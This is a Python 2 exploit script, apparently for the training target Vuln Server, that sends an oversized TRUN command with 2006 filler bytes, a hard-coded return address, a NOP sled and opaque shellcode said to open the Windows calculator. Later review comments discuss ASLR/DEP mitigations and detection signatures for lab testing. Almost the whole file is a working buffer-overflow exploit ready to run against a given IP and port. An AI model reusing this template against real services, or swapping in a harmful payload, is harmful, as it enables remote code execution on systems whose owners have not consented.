#Author: Aaron Huber
#Date: 5/2015
# This Python 2 script uses a buffer overflow in Vuln Server's TRUN command to open a calculator on a Windows 8 host running Vuln Server.
import sys
import socket
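# Usage: vulnfuzz_weap.py <ip> <port>
# Python 2 only: the str literals below are raw byte strings. Under Python 3
# they would be text and socket.send() would reject them.
if len(sys.argv) < 3:
    sys.exit("usage: %s <ip> <port>" % sys.argv[0])
ip = sys.argv[1]
port = int(sys.argv[2])

# Opaque machine-code payload. The file header says its effect is to launch
# the Windows calculator; nothing in this script decodes or inspects it.
# The bytes are static, so the leading sequence can anchor a network or
# memory signature when testing detections against this lab target.
buf = ""
buf += "\xd9\xcf\xd9\x74\x24\xf4\xbf\x8f\x95\xb6\xbe\x5a\x31"
buf += "\xc9\xb1\x33\x31\x7a\x17\x83\xea\xfc\x03\xf5\x86\x54"
buf += "\x4b\xf5\x41\x11\xb4\x05\x92\x42\x3c\xe0\xa3\x50\x5a"
buf += "\x61\x91\x64\x28\x27\x1a\x0e\x7c\xd3\xa9\x62\xa9\xd4"
buf += "\x1a\xc8\x8f\xdb\x9b\xfc\x0f\xb7\x58\x9e\xf3\xc5\x8c"
buf += "\x40\xcd\x06\xc1\x81\x0a\x7a\x2a\xd3\xc3\xf1\x99\xc4"
buf += "\x60\x47\x22\xe4\xa6\xcc\x1a\x9e\xc3\x12\xee\x14\xcd"
buf += "\x42\x5f\x22\x85\x7a\xeb\x6c\x36\x7b\x38\x6f\x0a\x32"
buf += "\x35\x44\xf8\xc5\x9f\x94\x01\xf4\xdf\x7b\x3c\x39\xd2"
buf += "\x82\x78\xfd\x0d\xf1\x72\xfe\xb0\x02\x41\x7d\x6f\x86"
buf += "\x54\x25\xe4\x30\xbd\xd4\x29\xa6\x36\xda\x86\xac\x11"
buf += "\xfe\x19\x60\x2a\xfa\x92\x87\xfd\x8b\xe1\xa3\xd9\xd0"
buf += "\xb2\xca\x78\xbc\x15\xf2\x9b\x18\xc9\x56\xd7\x8a\x1e"
buf += "\xe0\xba\xc0\xe1\x60\xc1\xad\xe2\x7a\xca\x9d\x8a\x4b"
buf += "\x41\x72\xcc\x53\x80\x37\x22\x1e\x89\x11\xab\xc7\x5b"
buf += "\x20\xb6\xf7\xb1\x66\xcf\x7b\x30\x16\x34\x63\x31\x13"
buf += "\x70\x23\xa9\x69\xe9\xc6\xcd\xde\x0a\xc3\xad\x81\x98"
buf += "\x8f\x1f\x24\x19\x35\x60"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
try:
    s.connect((ip, port))
    banner = s.recv(4096)
    print(banner)
    try:
        # Layout of the oversized TRUN argument: 2006 filler bytes, a 4-byte
        # value, 100 bytes of 0x90, then the payload.
        # NOTE(review): the 4-byte value presumably lands on a saved return
        # address -- confirm in a debugger against the lab binary. A
        # hard-coded address only works if the code it points at loads at a
        # fixed base, so ASLR/DEP on the target build is the mitigation to
        # check.
        # For detection, a TRUN argument this long and a long run of 0x90 are
        # both simple signature anchors.
        cmd = "TRUN ." + "E"*2006 + "\xAF\x11\x50\x62" + "\x90"*100 + buf
        s.send(cmd)
        data = s.recv(4096)
        print("Got %s" % data)
    except socket.error:
        # socket.timeout is a subclass of socket.error, so a missing reply
        # within the 5 s timeout or a connection reset lands here. The old
        # bare `except:` also swallowed KeyboardInterrupt and programming
        # errors and reported them as success. This branch only shows the
        # service stopped answering on this connection; it is not proof that
        # the payload ran.
        print("****************")
        print("TANGO DOWN")
        print("****************")
finally:
    # The original never closed the socket, on success or on failure.
    s.close()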